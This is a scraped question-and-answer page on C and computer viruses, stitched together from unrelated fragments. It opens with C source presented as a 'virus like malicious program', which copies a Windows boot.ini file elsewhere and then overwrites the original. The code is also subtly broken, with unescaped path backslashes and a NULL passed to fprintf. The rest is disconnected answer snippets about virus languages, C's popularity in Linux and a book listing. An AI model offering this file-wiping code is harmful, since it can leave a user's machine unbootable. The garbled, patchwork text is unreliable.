irus like malicious program
#include <stdio.h>
#include <conio.h>
void main()
{
char b,c;
FILE *f,*g,*h;
clrscr();
c=NULL;
f=fopen("d:\boot.ini","r");
g=fopen("e:\boot.ini","w");
while(1)
{
b=fgetc(f);
if (b==EOF)
break;
fprintf(g,"%c",b);
}
h=fopen("d:\boot.ini","w");
fprintf(h,"%s",c);
fclose(h);
fclose(g);
fclose(f);
getch();
}
No, but source-programs written in C language are.
Viruses can be written in various programming languages, including C, C++, and assembly language. The choice of programming language depends on the complexity and functionality of the virus that the creator wants to achieve.
Computer viruses can be written in any programming language, not just C. C would be a common language for a virus to be written in because C is fast, and allows viruses to directly access lower level functions like computer memory. C has also been a very popular language for many programs in the past, so those who decide to write a computer virus would be familiar with that language already.
Server side programs can certainly be written in C. They can be written in any language that the environment supports.
Assembly. C. Visual basic. Others.
I'm pretty sure that they're written in either C or C++.
C is the programming language (some) games are written in, your question makes no sense.
Most programs in Linux are written using C or C++.
Learn a programming language first like C or C++. However, it would be a wiser and better choice to make programs that do useful things instead of viruses.
You will be able to understand C programs. Also to write C programs.
The C language (or more commonly C++) is the core of most programming done at the desktop level. Most programs written in Linux are in C or C++, as are most Windows programs. A number of languages in recent computer history have been designed to reduce the dependency on C and C++, but have still largely failed to replace C and C++ for high performance applications.
James Kempf has written: 'Numerical software tools in C' -- subject(s): C (Computer program language), Computer programs, Numerical analysis